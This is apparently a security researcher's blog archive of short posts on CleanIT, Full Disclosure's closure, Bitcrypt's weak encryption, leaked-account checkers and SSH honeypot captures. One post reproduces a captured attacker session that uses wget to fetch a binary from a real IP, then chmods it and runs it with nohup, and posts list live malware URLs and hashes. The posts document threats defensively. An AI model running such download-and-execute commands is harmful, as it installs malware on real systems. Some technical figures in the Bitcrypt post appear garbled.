Author Archive

CleanIT close off

Tuesday, May 6th, 2014

The anti-abuse working group of RIPE has reported that the controversial european project “CleanIT”

has closed off:

“The project was closed in March, [..]  mentioned that the document explicitly states that they do not believe that filtering and blocking is a way to deal with on-line terrorism and the promotion of terrorist activities that the project was trying to solve. “

Sounds like good news..

 

Warning from the BSI

Tuesday, April 8th, 2014

Warning: there is an openssl-bug floating around – but don’t tell anyone without explicit permission.

.. says the the german BSI, totally ignoring the fact that the exploit for this bug is public available, including the announcement on bugtraq and full disclosure…

 

 

 

Good Bye, Full Disclosure

Wednesday, March 19th, 2014

The famous mailing list “full disclosure” closes its doors – John Cartwright, the Founder and maintainer

of the list announced the closing of the lis today.

 

<cite>

I’m not willing to fight this fight any longer. It’s getting harder to operate an open forum in today’s legal climate, let alone a

security-related one. There is no honour amongst hackers any more.

There is no real community. There is precious little skill. The

entire security game is becoming more and more regulated. This is all

a sign of things to come, and a reflection on the sad state of an

industry that should never have become an industry.

I’m suspending service indefinitely. Thanks for playing.

</cite>

Sad, but true .. I will miss this valuable source of information.

2000 new users

Thursday, February 27th, 2014

I wonder why I had about 2000 new user registrations on spamversand yesterday.

All these registrations came from about 100 IP-Adresses in total and from about

10 ip-nets (/24), all located in China. Still I had no comments or postings

coming from these ips. Guess there is either a bug in wordpress which these

people are preparing to use or the spam-postings  are still going to come..

 

bitbucket decrypt bitcrypt

Friday, February 21st, 2014

The evil bitcrypt malware, which encrypts files on hijacked pc and offers the decryption key

for a payment of 260 € has a serious flaw in the encryption design, Heise reported.

Fabien Perigaud und Cedric Pernet from bitbucket.org managed to find out that the used RSA-Key

had a length of 128 instead of 128 Byte; So they were able to crack the 426 bit key in 43 hours.

The free python-script is here available. Cool stuff 🙂

Leaked Data

Wednesday, January 29th, 2014

The BSI did announce the leak of 16 million accounts and offered a check

on their website to let people see if their account were hit.

https://www.sicherheitstest.bsi.de/

Now abusix did open their LeakDB with 200-300 million of

leaked account data. If you want to check if your data may be compromised:

https://leakdb.abusix.com/

MinCoin

Friday, January 10th, 2014

I am not up to date..

Looking at http://p2pool.org/ I see not only BitCoin storage, but also  FeatherCoin, LiteCoin, MemeCoin, Terra; FreiCoin, LottoCoin and other stuff..

Whew.. I did not think that there are so many crypto currencies out there.

I found this because my honeypot captured a link to

http://110.154.103.80:58455/x86 ( e66eb75f05328783c23745ef9d573de1 )

(I mentioned this program earlier (x86), but with a different md5-hash..)

Looking at the “x86” program one can find the installation of a miner for “MinCoins”, storing them at p2pool.org.

I am wondering why not even one of the virustotal-engines thinks, that this is malware..

 

disknyp 3

Monday, December 16th, 2013

disknyp doesn’t seem to be a new thing..

In the paper:

 

141
PATTERNS AND PATTER  AN INVESTIGATION INTO  SSH ACTIVITY USINGKIPPO HONEYPOTS
CraigValli,PriyaRabadiaandAndrewWoodward
EdithCowanUniversity,Security
ResearchInstitute
Perth,Australia

c.valli@ecu.edu.au,prabadia@our.ecu.edu.au,a.woodward@ecu.edu.a

 

(to be found at http://ro.ecu.edu.au/cgi/viewcontent.cgi?article=1126&context=adf ) the download URL is already mentioned. Also clean-mx knows the file host; and on http://honey1.christiaan008.tk:8080/kippo-graph/kippo-input.php there is also a good look at these activities.

disknyp 2

Monday, December 16th, 2013

Meanwhile I captured  268 samples of disknyp.

Can be found on: http://198.2.192.204:22/disknyp

cool .. webserver on the ssh-port 🙂

The server answers with:

Content-Type: text/html
Content-Length: 4440
Accept-Ranges: bytes
Server: HFS 2.3 beta
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1

Looks like the webserver running is from:

http://ha-hfs.googlecode.com/files/hfs2.3 beta271.exe

Also available for download on this webserver is a

svch.exe , probably infected for window-machines.

Virustotal says, only 24 from 48 antivir-vendors discover this

trojan.

MD5 9d37ef3a5388b1d3d67a8759f178dd2d
SHA1 c09437f9d2752fc8ded68429ac33392c846370fc
SHA256 5c7d2aa53e55977b1bd677d6a3415c7e9900769fc49e9e3bed1fd42d73f0381b

 

 

disknyp

Monday, December 2nd, 2013

Yesterday my ssh-honeypot captured 54 samples of “disknyp”.

All logins (probably automated) did the following:

**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget http://198.2.192.204:22/disknyp
–2013-12-01 03:58:03–  http://198.2.192.204:22/disknyp
Connecting to 198.2.192.204:22… connected.
HTTP request sent, awaiting response… 503 ?????????
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found
**x:>

The file is a 1491887 Bytes  ELF 32-bit LSB executable. I don’t know yet what it is doing..